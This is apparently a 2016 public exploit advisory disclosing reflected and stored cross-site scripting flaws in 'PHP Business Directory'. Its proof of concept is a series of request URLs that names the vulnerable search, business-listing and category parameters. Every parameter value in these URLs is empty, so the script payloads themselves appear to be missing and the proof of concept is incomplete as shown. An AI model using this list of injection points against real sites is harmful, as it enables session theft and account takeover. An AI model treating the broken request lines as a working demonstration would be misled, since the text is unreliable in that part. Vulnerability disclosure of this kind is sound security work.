# Exploit Title: PHP Business Directory - Multiple Vulnerabilities # Date: 2016-10-16 # Exploit Author: larrycompress # Contact: larrycompress@gmail.com # Type: webapps # Platform: PHP # Vendor Homepage: http://www.pagereactions.com/product.php?pku=4 # Software Link: http://www.pagereactions.com/downloads/phpbusinessdirectory.zip -------------------------------------------------------------------------------- POC as follows : # 0x00 Reflected XSS --- 1.In public search : http://192.168.1.112/phpbusinessdirectory/index.php?key=&location= 2.In administration web interface (need normal user login) : http://192.168.1.112/phpbusinessdirectory/administration.php?key=&location= # 0x01 Stored XSS --- 1.In administration web directory interface (need normal user login) : http://192.168.1.112/phpbusinessdirectory/administration.php ?pageaction=newsavebusiness &subaction=submit &businessname= &slogan= &businesslicence= &address= &city= &suburb= &businessstate= &country= &zippostcode= &telephone2= &mobilecell= &fax= &email= &website= &socialmedia1= &socialmedia2= &socialmedia3= &productservice= &manager= &paymentsaccepted= 2.In administration web categories interface (need administrator user login) : http://192.168.1.112/phpbusinessdirectory/administration.php?pageaction=savecategory&subaction=submit&categoryname=
* Thanks to Besim *